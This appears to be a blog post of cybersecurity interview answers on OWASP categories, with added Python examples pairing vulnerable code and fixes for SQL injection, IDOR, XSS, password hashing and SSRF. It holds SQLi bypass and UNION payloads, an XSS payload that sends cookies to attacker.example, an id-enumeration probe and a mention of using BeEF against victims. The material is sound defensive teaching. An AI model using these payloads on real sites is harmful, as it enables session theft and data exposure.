
Day-4 Cybersecurity Interview Questions

What is OWASP? Can you explain some web application vulnerabilities?

7 min read · Feb 11, 2024


The OWASP (Open Web Application Security Project) Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. Here are the ten categories from the 2021 edition:

  • Broken Access Control: Enforce authorization on every request so users cannot act outside their intended permissions (for example, by changing an ID in a URL).
  • Cryptographic Failures: Weak or misused cryptography (old algorithms, missing encryption, poor key management) that leads to sensitive data exposure.
  • Injection: Untrusted input reaching an interpreter (SQL, NoSQL, OS command, LDAP); since 2021 this category also includes cross-site scripting.
  • Insecure Design: Flaws in the design itself that no implementation can fix; address them early with threat modeling and secure design patterns.
  • Security Misconfiguration: Default accounts, verbose error messages, unnecessary features enabled, or missing hardening anywhere in the stack.
  • Vulnerable and Outdated Components: Libraries, frameworks and platforms with known vulnerabilities, or that are no longer maintained.
  • Identification and Authentication Failures: Weak password policies, credential stuffing, missing MFA, or poor session management.
  • Software and Data Integrity Failures: Code and infrastructure that trust updates, plugins, or serialized data without verifying integrity (including insecure CI/CD pipelines).
  • Security Logging and Monitoring Failures: Breaches that go undetected because events are not logged, monitored, or alerted on.
  • Server-Side Request Forgery (SSRF): The application fetches a user-supplied URL without validating it, reaching internal systems on the attacker's behalf.
Image: OWASP Top 10

Explain SQL Injection and its types?

Whenever I hear SQL injection, ' OR 1=1 -- is the first thing that comes to mind. SQL injection is a vulnerability where an attacker injects malicious SQL into the input fields of a web application, such as a search box or a login form, and the application passes that input to the database as part of a query. This can allow the attacker to read, modify, or delete data, bypass authentication, or in some cases take over the web application or the database server.

  • Error-based SQL injection: The attacker relies on database error messages to learn about its structure and data. For example, entering a single quote (') in an input field and checking whether the application returns an error that reveals the SQL query that was executed.
  • Union-based SQL injection: The attacker uses the UNION operator to append a second SELECT (with a matching number of columns) to the original query, so that data from another table is returned in the normal response.
  • Boolean-based (blind) SQL injection: The attacker appends a condition with AND or OR that evaluates to true or false, and observes whether the page content or status code changes. No data is returned directly; it is inferred one bit at a time.
  • Time-based (blind) SQL injection: The attacker injects a delay (SLEEP in MySQL, WAITFOR DELAY in SQL Server, pg_sleep in PostgreSQL) and measures whether the response takes correspondingly longer. This works even when the page shows no visible difference at all.
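The two most common cases above (authentication bypass and union-based data extraction) as an added example, not code from the original post: a login check and a search built by string concatenation, each beside its parameterized fix, run against an in-memory SQLite database seeded with constructed sample users so it executes offline.

```python
# Added example (not from the original post): string-concatenated queries beside
# their parameterized fixes, against a constructed in-memory SQLite database.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Plaintext passwords only to keep the injection visible; never store them this way.
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Attacker text is spliced into the SQL grammar. With username  ' OR 1=1 --
    # the WHERE clause becomes  username = '' OR 1=1 --...  and everything after
    # the comment marker is ignored: the first user in the table "logs in".
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    # Bound parameters travel as data; the query structure is fixed before the
    # values are seen, so quotes and comment markers in the input are inert.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, term: str):
    # Union-based injection: the attacker closes the LIKE string and appends a
    # SELECT with the same column count that reads a different column.
    query = f"SELECT id, username FROM users WHERE username LIKE '%{term}%'"
    return conn.execute(query).fetchall()


def search_safe(conn, term: str):
    return conn.execute(
        "SELECT id, username FROM users WHERE username LIKE ?", (f"%{term}%",)
    ).fetchall()


BYPASS_PAYLOAD = "' OR 1=1 --"
UNION_PAYLOAD = "zz%' UNION SELECT id, password FROM users --"

if __name__ == "__main__":
    db = make_db()
    print("bypass  ->", login_vulnerable(db, BYPASS_PAYLOAD, "x"))   # alice
    print("fixed   ->", login_safe(db, BYPASS_PAYLOAD, "x"))         # None
    print("union   ->", search_vulnerable(db, UNION_PAYLOAD))        # password column leaks
    print("fixed   ->", search_safe(db, UNION_PAYLOAD))              # []
```

The fix is the same in every language and driver: keep the query text constant and pass values as bound parameters. Escaping quotes by hand is not a substitute, and the union payload shows why the vulnerable query is not limited to the table it names.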

Types of SQL Injection (SQLi) — GeeksforGeeks

https://www.wallarm.com/what/structured-query-language-injection-sqli-part-1

What is Broken Access Control?

Broken access control is a type of vulnerability that allows unauthorized users to gain access to resources or functionalities that they should not have access to. Access control is the process of granting or denying access to different parts of a web application based on the user’s identity, role, or permissions.


If access control is not properly enforced, an attacker may be able to bypass it and exploit the web application. For example, an attacker may be able to:

  • Access or modify someone else's account or data by changing the user ID or other parameters in the URL or request body (insecure direct object reference, IDOR, a form of horizontal privilege escalation).
  • Reach restricted pages or functions by guessing or brute-forcing URLs, or by tampering with request headers, cookies, or tokens (forced browsing).
  • Elevate their privileges to an administrative role by exploiting a logic flaw or misconfiguration, for example by changing a role field in a request or a claim in a JWT (vertical privilege escalation).
  • Perform actions on behalf of another user by stealing or forging their session tokens or credentials (session hijacking), or by making the victim's browser send the request for them (CSRF).
  • Access data or systems that were never meant to be exposed, through default passwords, directory listings, backup files, or exposed internal endpoints (unprotected resources or misconfiguration).

Broken access control can have serious consequences for the web application and its users, such as data breaches, identity theft, fraud, or denial of service.
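The IDOR case from the list above as an added example, not code from the original post: an invoice lookup that trusts the id in the request beside one that checks ownership and role, plus the id-walking probe a tester would run against each. The invoice store, user names and roles are constructed stand-ins for a real application.

```python
# Added example (not from the original post): IDOR-vulnerable vs. authorized lookup
# over a constructed in-memory invoice store.
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner: str
    amount: int


INVOICES = {
    1001: Invoice(1001, "alice", 120),
    1002: Invoice(1002, "bob", 75),
}

# Assumed roles: customers see their own invoices, support sees all of them.
ROLES = {"alice": {"customer"}, "bob": {"customer"}, "carol": {"support"}}


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> Optional[Invoice]:
    # Authentication happened (we know who current_user is) but nothing ties the
    # requested id to that user: /invoices/1002 works for alice as well as bob.
    return INVOICES.get(invoice_id)


def get_invoice_safe(current_user: str, invoice_id: int) -> Optional[Invoice]:
    inv = INVOICES.get(invoice_id)
    if inv is None:
        return None
    # Deny by default; allow only the owner or a role that legitimately needs
    # cross-customer access. Returning None for both "missing" and "not yours"
    # (a 404 in HTTP terms) keeps an attacker from mapping which ids exist.
    if inv.owner == current_user or "support" in ROLES.get(current_user, set()):
        return inv
    return None


def enumerate_ids(fetch: Callable, user: str, start: int, stop: int) -> list:
    # The classic IDOR probe: walk a numeric id range as one low-privilege user
    # and record which objects come back.
    return [i for i in range(start, stop) if fetch(user, i) is not None]
```

The check belongs in the data access layer or a central authorization policy, not in each handler, so that a new endpoint cannot forget it; and unguessable ids (random UUIDs) reduce enumeration but are not a substitute for the ownership check.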

https://my.f5.com/manage/s/article/K44094284

Explain types of XSS?

Cross-site scripting (XSS) is a web vulnerability that allows an attacker to inject client-side script into pages served by a website. The script then runs in the browser of a user who visits the page, with that page's origin, so it can read or modify page content, steal cookies or session tokens (unless they are HttpOnly), redirect the user to a malicious site, or perform actions on their behalf.

  • Reflected XSS: The attacker sends the victim a crafted link or email. When the victim clicks it, the request carries the attacker's payload, the server echoes it into the response without encoding, and it executes in the victim's browser.
  • Stored XSS: The attacker submits a malicious script that the server stores (in a database, comment, profile field, or log). It is later served to every visitor as part of the page content and executes in their browsers.
  • DOM-based XSS: Client-side JavaScript takes attacker-controlled data from the DOM (the URL fragment, location.search, document.referrer) and writes it into a dangerous sink such as innerHTML or eval. The payload may never reach the server; the flaw is entirely in the client-side code.

https://www.geeksforgeeks.org/what-is-cross-site-scripting-xss/
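The reflected case above, as an added example that is not code from the original post: a "search results" page rendered with and without contextual output encoding, plus the response headers that limit the damage when encoding is missed. The query parameter and payload are constructed; no web framework is assumed.

```python
# Added example (not from the original post): reflected XSS, its encoding fix, and
# the defence-in-depth headers, on constructed input.
import html

# Cookie-stealing payload an attacker would place in a link's ?q= parameter.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    # Raw parameter concatenated into the HTML body: the browser parses the
    # injected <script> element as part of the page.
    return f"<h1>Results for: {query}</h1>"


def render_safe(query: str) -> str:
    # Encode for the HTML text context so < > & " ' are displayed, not parsed.
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def render_attr_safe(query: str) -> str:
    # Inside a *quoted* attribute the same encoding is enough; the attribute must
    # be quoted, otherwise a space in the input would start a new attribute.
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def has_active_script(doc: str) -> bool:
    return "<script" in doc.lower()


def security_headers(session_id: str) -> dict:
    # Defence in depth: the CSP blocks inline script even if encoding is missed,
    # and HttpOnly stops document.cookie from reading the session token.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax",
        "X-Content-Type-Options": "nosniff",
    }
```

Encoding is context-specific: the HTML-entity encoding shown here is wrong for a JavaScript string, a URL, or a CSS value, each of which needs its own encoder, and DOM-based XSS is fixed in the client code (use textContent instead of innerHTML) rather than on the server.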

What type of tools do you use for XSS attacks?

Everyone has their preferences, but I like to use the BeEF XSS framework, Burp Suite, and XSS Hunter (xsshunter.com). I mostly use the BeEF XSS framework; it has a nice GUI interface to interact with the victim.

What are cryptographic failures? Can you explain with some examples?

Cryptographic failures are a category of web application vulnerability that occurs when the application does not use cryptography properly to protect sensitive data at rest or in transit. This can lead to data exposure, system compromise, or other attacks. Cryptographic failures are ranked second (A02) in the OWASP Top 10:2021 list. Common examples:

  • Using weak or outdated algorithms or protocols, such as MD5 or SHA-1 for integrity or signatures, DES or RC4 for encryption, or SSL and early TLS versions for transport.
  • Using default or hard-coded keys, or not managing or rotating keys securely.
  • Storing passwords in plain text, with reversible encryption, or with a fast unsalted hash instead of a slow, salted password hash (Argon2id, bcrypt, scrypt, or PBKDF2).
  • Not validating certificates or checking for hostname mismatches on TLS connections.
  • Not using authenticated encryption (AES-GCM or ChaCha20-Poly1305), relying instead on ECB mode or on CBC without a MAC, which invites padding-oracle attacks.
  • Not using a cryptographically secure random number generator, or seeding one with insufficient entropy.
  • Exposing cryptographic error messages or side-channel information (timing differences, detailed padding errors).
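The password-storage item above as an added example, not code from the original post: fast unsalted MD5 beside a salted, iterated hash with constant-time verification. It uses only the Python standard library; PBKDF2 is the portable choice there, and Argon2id or bcrypt from a vetted library are preferable where available. The iteration count is an assumption to be tuned per deployment.

```python
# Added example (not from the original post): weak vs. proper password hashing.
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; tune so one hash takes ~100 ms


def hash_password_weak(password: str) -> str:
    # Unsalted and fast: equal passwords give equal digests across users, and
    # precomputed tables or a GPU reverse it in bulk.
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    salt = os.urandom(16)  # CSPRNG; random.random() is not acceptable here
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Self-describing record so the work factor can be raised later without
    # invalidating existing hashes.
    return "pbkdf2_sha256${}${}${}".format(
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    # Constant-time comparison: a plain == leaks how many leading bytes matched.
    return hmac.compare_digest(actual, expected)
```

Two hashes of the same password differ because each gets a fresh salt, which is exactly what defeats rainbow tables and stops an attacker from cracking every user with one guess.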

A02 Cryptographic Failures — OWASP Top 10:2021

What is MD5 Collision?

An MD5 collision is two different inputs that produce the same 128-bit MD5 hash. No hash function can be unique for every input: there are far more possible inputs than 128-bit outputs, so by the pigeonhole principle collisions must exist. What matters in practice is that they are supposed to be infeasible to find, and for MD5 they are not: practical collision attacks have been public since 2004, and freely available tools produce identical-prefix collisions in seconds on commodity hardware, which is why MD5 must not be used for signatures, certificates, or integrity checks.
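The pigeonhole argument made concrete as an added example, not code from the original post: a birthday search that finds two different inputs whose MD5 digests agree on the first 32 bits, together with the birthday-bound estimate of how much work a given digest width costs. The message format is a constructed counter so the result is reproducible. Full 128-bit MD5 collisions are not found this way (that would take about 2^64 hashes); they come from the cryptanalytic attacks the reference below builds on.

```python
# Added example (not from the original post): birthday search on a truncated MD5.
import hashlib
import math
from itertools import count


def md5_prefix(data: bytes, nbytes: int) -> bytes:
    return hashlib.md5(data).digest()[:nbytes]


def expected_trials(bits: int) -> float:
    # Birthday bound: about sqrt(pi/2 * 2^bits) random inputs for a 50% chance of
    # a collision in a bits-wide digest. For 128 bits that is roughly 2^64.
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_truncated_collision(nbytes: int = 4, prefix: bytes = b"msg-"):
    # Hash distinct messages until two share the first nbytes of their MD5.
    # Memory grows with the number of trials (~82,000 entries for 32 bits).
    seen = {}
    for i in count():
        msg = prefix + str(i).encode()
        tag = md5_prefix(msg, nbytes)
        if tag in seen:
            return seen[tag], msg
        seen[tag] = msg


if __name__ == "__main__":
    a, b = find_truncated_collision(4)
    print(a, b, md5_prefix(a, 4).hex())
    print("trials for a full MD5 birthday collision:", f"{expected_trials(128):.2e}")
```

Raising nbytes by one multiplies the expected work by 16, so the same loop becomes hopeless well before 128 bits; MD5's real weakness is that its compression function lets an attacker do far better than this generic bound.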

Nat McHugh: Create your MD5 collisions

Can you explain Server Side Request Forgery (SSRF)?

SSRF stands for Server-Side Request Forgery, which is a type of web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.

For example, suppose there is a web application that allows users to import data from a URL. The web application takes the user's input, sends a request to the specified URL, and displays the data on the web page. An attacker can exploit this functionality by supplying a URL that points to a system the web application can reach but the attacker cannot, and read or manipulate information they are not authorized to. Typical targets are services reachable only from the server: internal admin interfaces, databases, or a cloud provider's instance metadata endpoint, which hands out credentials to whoever asks from inside the instance.
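Validation for that "import from URL" feature as an added example, not code from the original post: it combines a scheme check, a host allowlist, and a check that every address the host resolves to is public, and it handles the usual bypasses (credentials in the URL, literal IPs, IPv4-mapped IPv6). DNS is replaced by a constructed table (FAKE_DNS) so the example runs offline; the hostnames and addresses in it are assumptions, not real services.

```python
# Added example (not from the original post): SSRF-resistant URL validation with a
# constructed resolver.
import ipaddress
from typing import Callable, Iterable, Optional
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"data.partner.example"}  # assumed allowlist for the import feature

# Loopback, link-local (cloud metadata lives at 169.254.169.254), RFC 1918,
# shared address space, and their IPv6 equivalents.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

FAKE_DNS = {  # constructed stand-in for DNS
    "data.partner.example": ["203.0.113.10"],   # assumed public partner host
    "evil.example": ["169.254.169.254"],        # attacker name pointing at metadata
    "localhost": ["127.0.0.1"],
}


class SSRFBlocked(ValueError):
    pass


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])


def _is_internal(ip) -> bool:
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return any(ip in net for net in BLOCKED_NETS)


def check_import_url(url: str, allowlist: Optional[set] = ALLOWED_HOSTS,
                     resolve: Callable[[str], Iterable[str]] = fake_resolve) -> str:
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise SSRFBlocked(f"scheme {parts.scheme!r} not allowed")
    if parts.username or parts.password:
        raise SSRFBlocked("credentials in URL")  # http://allowed.host@10.0.0.1/ trick
    host = parts.hostname
    if not host:
        raise SSRFBlocked("no host")
    if allowlist is not None and host not in allowlist:
        raise SSRFBlocked(f"host {host!r} not in allowlist")
    try:
        targets = [ipaddress.ip_address(host)]  # literal IP in the URL
    except ValueError:
        targets = [ipaddress.ip_address(a) for a in resolve(host)]
    if not targets:
        raise SSRFBlocked(f"{host} does not resolve")
    for ip in targets:
        if _is_internal(ip):
            raise SSRFBlocked(f"{host} resolves to internal address {ip}")
    return url


def is_allowed(url: str, **kwargs) -> bool:
    try:
        check_import_url(url, **kwargs)
        return True
    except SSRFBlocked:
        return False
```

Two caveats a reviewer would raise: resolve once and connect to the validated address (otherwise a DNS rebinding attacker answers the validation lookup with a public IP and the fetch lookup with an internal one), and either disable HTTP redirects on the fetch or re-run this check on every hop, since a redirect to an internal URL bypasses a check done only on the original.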

What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy (portswigger.net)

What is the Mother of All Breach? Why people are talking about it?

The Mother of All Breaches (MOAB) is the name given to a dataset of about 26 billion records found exposed online in January 2024. It is a compilation of data from thousands of earlier breaches of services such as LinkedIn, Twitter, Adobe and many other organizations, totaling roughly 12 terabytes. Its sheer size made it one of the largest leaks ever seen, and aggregated dumps like this feed credential stuffing and targeted phishing, which is why people were talking about it.

“The mother of all breaches”: 26 billion records found online [Updated] | Malwarebytes

What is insider threat? how do you prevent insider threats?

An insider threat is a security risk that comes from people within an organization, such as employees, former employees, contractors, or business associates, who have inside information or access to the organization’s data, systems, or networks. An insider threat can cause harm to the organization intentionally or unintentionally, by exposing, stealing, modifying, or destroying sensitive or confidential information.

Preventions:

  • Conduct regular security awareness training for all staff and contractors, and enforce security policies and procedures (acceptable use, data handling, offboarding).
  • Perform background checks and screening for new hires, and keep screening and monitoring proportionate for roles with high-risk access.
  • Use technical controls such as encryption, authentication, authorization, logging, and auditing to protect data and systems from unauthorized access or misuse, and data loss prevention controls to spot bulk data leaving the organization.
  • Use monitoring tools such as User and Entity Behavior Analytics (UEBA) to detect and respond to suspicious or anomalous activity, for example unusual download volumes or after-hours access.
  • Enforce least privilege through IAM: grant access based on job need, review it regularly, and revoke it promptly when roles change or people leave.
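A small behavioral check of the kind a UEBA tool automates, as an added example that is not code from the original post: it runs over constructed download logs and flags a user whose daily download volume jumps far above their own baseline, and any download made outside business hours. The log lines, user names, business-hours window and ratio are all assumptions.

```python
# Added example (not from the original post): two simple insider-threat signals
# computed over constructed "timestamp,user,action,bytes" log lines.
from collections import defaultdict
from datetime import datetime
import statistics

SAMPLE_LOG = """\
2024-02-05T10:12:04,alice,download,120000
2024-02-06T11:03:41,alice,download,150000
2024-02-07T09:45:10,alice,download,130000
2024-02-08T14:20:33,alice,download,160000
2024-02-09T10:05:57,alice,download,110000
2024-02-10T23:41:18,alice,download,2500000000
2024-02-10T23:52:02,alice,download,1500000000
2024-02-05T09:30:00,bob,download,300000
2024-02-06T09:40:12,bob,download,280000
2024-02-07T09:35:48,bob,download,310000
2024-02-08T09:38:05,bob,download,295000
2024-02-09T09:41:27,bob,download,305000
"""

BUSINESS_HOURS = (6, 20)  # assumed: 06:00 to 20:00 local time is normal activity


def parse_log(text: str):
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, action, nbytes = line.split(",")
        yield datetime.fromisoformat(ts), user, action, int(nbytes)


def daily_totals(events):
    totals = defaultdict(int)
    for ts, user, action, nbytes in events:
        if action == "download":
            totals[(user, ts.date().isoformat())] += nbytes
    return totals


def flag_anomalies(text: str, ratio: float = 5.0):
    """Return sorted (user, day, reason) tuples for after-hours and volume spikes."""
    events = list(parse_log(text))
    flags = set()

    # Signal 1: activity outside business hours.
    start, end = BUSINESS_HOURS
    for ts, user, action, _ in events:
        if action == "download" and not (start <= ts.hour < end):
            flags.add((user, ts.date().isoformat(), "after_hours"))

    # Signal 2: a day's volume far above the same user's median on other days.
    # Comparing each user to their own history avoids flagging naturally heavy
    # users (bob) while catching a sudden change (alice's final day).
    per_user = defaultdict(dict)
    for (user, day), total in daily_totals(events).items():
        per_user[user][day] = total
    for user, days in per_user.items():
        for day, total in days.items():
            others = [v for d, v in days.items() if d != day]
            if len(others) >= 3 and total > ratio * statistics.median(others):
                flags.add((user, day, "volume"))
    return sorted(flags)
```

In production these signals would be one input to a risk score rather than an alert on their own, and the baseline would be learned over weeks per user and per peer group; but the shape is the same: compare behavior to the entity's own history, not to a global threshold.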

What Is an Insider Threat? Definition, Types, and Prevention | Fortinet

Contact Information

https://www.linkedin.com/in/avahack/

https://medium.com/@avahack

Email: Lprathap66@gmail.com
